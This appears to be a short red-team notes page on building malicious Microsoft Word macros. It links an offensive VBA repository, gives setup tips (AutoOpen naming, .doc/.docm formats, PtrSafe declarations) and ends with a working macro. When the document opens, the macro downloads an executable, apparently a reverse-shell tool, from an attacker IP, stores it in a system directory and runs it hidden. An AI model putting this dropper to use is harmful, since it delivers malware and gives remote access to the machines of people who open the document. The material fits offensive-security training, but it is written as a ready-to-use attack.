{% embed url="https://github.com/S3cur3Th1sSh1t/OffensiveVBA" %} Use for macro payload {% endembed %}
- Enable Developer Tools in the Ribbon Menu to gain access to macros
- Name your Macro AutoOpen() if you are working with Word 2016+
- Select the Current Document as the place to store the Macro
- Don't use .docx as the file extension since it won't allow for embedded macros. Either use .doc or .docm
- When using the 64 bit version of Microsoft Word, Declare VBA functions with "PtrSafe" to avoid compilation errors.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
ByVal lpCmdLine As String, _
ByVal uCmdShow As Long) As Long
Sub AutoOpen()
URLDownloadToFileA 0, "http://<ip>/rcat.exe", "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", 0, 0
WinExec "C:\Windows\system32\spool\drivers\color\rcat_<ip>_<port>.exe", SHOW_HIDE
End Sub